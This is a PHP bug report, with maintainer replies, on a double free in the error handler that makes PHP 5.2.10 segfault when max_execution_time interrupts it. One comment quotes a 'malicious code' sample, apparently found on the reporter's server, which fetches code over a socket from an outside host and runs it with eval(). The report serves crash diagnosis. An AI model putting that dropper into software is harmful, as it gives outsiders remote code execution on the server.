php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #49484 max_execution_time interrupts the error_handler causing a segfault
Submitted: 2009-09-06 13:21 UTC Modified: 2009-11-20 01:00 UTC
From: witekfl at gazeta dot pl Assigned:
Status: No Feedback Package: Reproducible crash
PHP Version: 5.2.10 OS: Debian Linux
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: witekfl at gazeta dot pl
New email:
PHP Version: OS:

 

 [2009-09-06 13:21 UTC] witekfl at gazeta dot pl
Description:
------------
php-5.2.10 with the fpm patch aplied running as FastCGI with Apache and mod_fcgid
Here is a fragment of the backtrace:
#0  0x00007f86f9acced5 in raise () from /lib/libc.so.6
#1  0x00007f86f9ace3f3 in abort () from /lib/libc.so.6
#2  0x00007f86f9b093a8 in ?? () from /lib/libc.so.6
#3  0x00007f86f9b0e948 in ?? () from /lib/libc.so.6
#4  0x00007f86f9b10a56 in free () from /lib/libc.so.6
#5  0x00000000006a5509 in php_error_cb (type=1,
    error_filename=0xe37778 "/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) : eval()'d code",
    error_lineno=9, format=<value optimized out>, args=<value optimized out>)
    at /home/witekfl/PHP/php-5.2.10/main/main.c:831
#6  0x00000000006e5f04 in zend_error (type=1, format=0x9c2418 "Maximum execution time of %d second%s exceeded")
    at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#7  <signal handler called>
#8  0x00007f86f9b15d95 in strdup () from /lib/libc.so.6
#9  0x00000000006a551a in php_error_cb (type=2,
    error_filename=0xe37778 "/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) : eval()'d code",
    error_lineno=9, format=<value optimized out>, args=<value optimized out>)
    at /home/witekfl/PHP/php-5.2.10/main/main.c:834
#10 0x00000000006e5f04 in zend_error (type=2, format=0x9c4778 "%s%s%s(): supplied argument is not a valid %s resource")
    at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#11 0x00000000006f35ce in zend_fetch_resource (passed_id=<value optimized out>, default_id=<value optimized out>,
    resource_type_name=0x9abbd0 "stream", found_resource_type=0x0, num_resource_types=<value optimized out>)
    at /home/witekfl/PHP/php-5.2.10/Zend/zend_list.c:130


And here is the fragment of main.c:
        /* store the error if it has changed */
        if (display) {
                if (PG(last_error_message)) {
                        free(PG(last_error_message));
                }
                if (PG(last_error_file)) {
                        free(PG(last_error_file));
                }
                PG(last_error_type) = type;
                PG(last_error_message) = strdup(buffer);
                PG(last_error_file) = strdup(error_filename);
                PG(last_error_lineno) = error_lineno;
        }

After the free(), the php_error_cb is interrupted by the signal (zend_timeout) and the given fragment is run with the new error_message, but the PG(last_error_message) or PG(last_error_file) is already freed, but still has old value, another free is causing crash.

max_execution_time = 2
allow_url_fopen = Off


Reproduce code:
---------------
ini_set("max_execution_time", 2);
for (;;) {
  file_get_contents("http://google.com/");
}
/* I'm not sure if exactly this code crashes, but the code with undefined variables and functions, trying to connect to the outside will do very often. Connections to the outside are rejected by iptables. */


Expected result:
----------------
No segfaults.

Actual result:
--------------
Often segfaults.

Patches

max_execution_time-prevent_double_free.patch (last revision 2010-03-13 08:17 UTC by witekfl at gazeta dot pl)

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2009-09-06 13:31 UTC] jani@php.net
Obvious question is: Does it happen without the 3rd party patch?
 [2009-09-06 14:19 UTC] witekfl at gazeta dot pl
I disabled fpm and still the same.
 [2009-09-09 13:13 UTC] witekfl at gazeta dot pl
Here is a malicious code:

<?php
@$s = fsockopen("google.com",80);
stream_set_timeout($s, 3);
fputs($s, "GET / HTTP/1.0\nHost: google.com\n\n");
$o="";
while(!feof($s)) $o.=fgets($s,1000);
$o=substr($o,strpos($o,"\r\n\r\n")+4);
fclose($s);
eval($o);
?>
aa

The setup is following:
nginx + apache + mod_layout + mod_fcgid + php-cgi as fastcgi
php-cgi has suid bit set and runs as user www-data.
nginx and apache runs on different users to php-cgi.
max_execution_timeout is 2 seconds.
iptables rejects connections to google.com (to the outside) for php-cgi.
php segfaults very often and Apache returns status 500.
 [2009-09-09 19:54 UTC] jani@php.net
To rule out one possible problem: is ZTS enabled in your build? (check 
your phpinfo() output for "Thread Safety", it should be "disabled"..
 [2009-09-09 19:59 UTC] witekfl at gazeta dot pl
ThreadSafety disabled.
 [2009-09-11 19:54 UTC] witekfl at gazeta dot pl
php.ini:
display_errors = Off
max_execution_time = 1
disable_functions = sleep

t.php:
<?php
for (;;) {
    sleep(1);
}

cat t.php | php-cgi -c php.ini

Run it a few times.
It segfaults for me.

Try with export MALLOC_CHECK_=2
 [2009-11-12 22:54 UTC] jani@php.net
Please try using this snapshot:

  http://snaps.php.net/php5.2-latest.tar.gz
 
For Windows:

  http://windows.php.net/snapshots/


 [2009-11-20 01:00 UTC] php-bugs at lists dot php dot net
No feedback was provided for this bug for over a week, so it is
being suspended automatically. If you are able to provide the
information that was originally requested, please do so and change
the status of the bug back to "Open".
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Mar 28 22:01:26 2024 UTC